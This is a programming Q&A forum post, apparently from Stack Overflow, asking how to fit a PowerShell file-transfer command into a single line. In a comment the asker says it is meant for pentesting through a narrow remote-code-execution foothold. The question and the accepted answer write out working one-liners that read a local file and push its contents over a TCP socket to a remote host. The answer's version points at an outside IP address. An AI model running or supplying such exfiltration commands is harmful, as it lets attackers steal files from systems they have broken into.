# Powershell IEX one liner gives an error, but input works as expected

Tags: powershell

My goal is to create a one liner to send files through command line.
At first, I tried

```
powershell $stuff = Get-Content -Raw "file.txt"; $socket = new-object system.net.sockets.TCPCLient([System.Net.IPAddress]::Parse("192.168.0.3"),4442); $stream = $socket.getStream(); $Writer = New-Object System.IO.StreamWriter($stream); $Writer.WriteLine($stuff); $Writer.flush(); $Stream.close();
```

But that didn't work

So I tried

```
powershell iex "$stuff = Get-Content -Raw \"file.txt\"; $socket = new-object system.net.sockets.TCPCLient([System.Net.IPAddress]::Parse(\"192.168.0.3\"),4442); $stream = $socket.getStream(); $Writer = New-Object System.IO.StreamWriter($stream); $Writer.WriteLine($stuff); $Writer.flush(); $Stream.close();"
```

But that gave another error. Also tried it with singlequotes. That didn't work too. How do I execute this powershell code through a one-liner in command prompt?

EDIT: I want to avoid encoding in base64 for versatility and convenience purposes.

Comment: WHY are you so keen on stuffing everything in on single line of code? By doing that, you are bound to overlook mistakes and the code gets more unreadable if ever you need to adjust it.

Comment: Because it's for pentesting purposes. If you have an RCE that's very narrow, one-liners are the way to go for most operations. Writing scripts to disk and multi-line commands become something that may be harder to pull off. Of course, this isn't some all-powerful file transfer pentesting command that fits in every situation, but for the purpose that I've described, it's very useful

Answer (score 0, accepted):

Looks like if I just do

```
powershell "$stuff = Get-Content -Raw 'file.txt'; $socket = new-object system.net.sockets.TCPCLient([System.Net.IPAddress]::Parse('172.104.33.55'),4442); $stream = $socket.getStream(); $Writer = New-Object System.IO.StreamWriter($stream); $Writer.WriteLine($stuff); $Writer.flush(); $Stream.close();"
```

It just works. 
Sure I guess.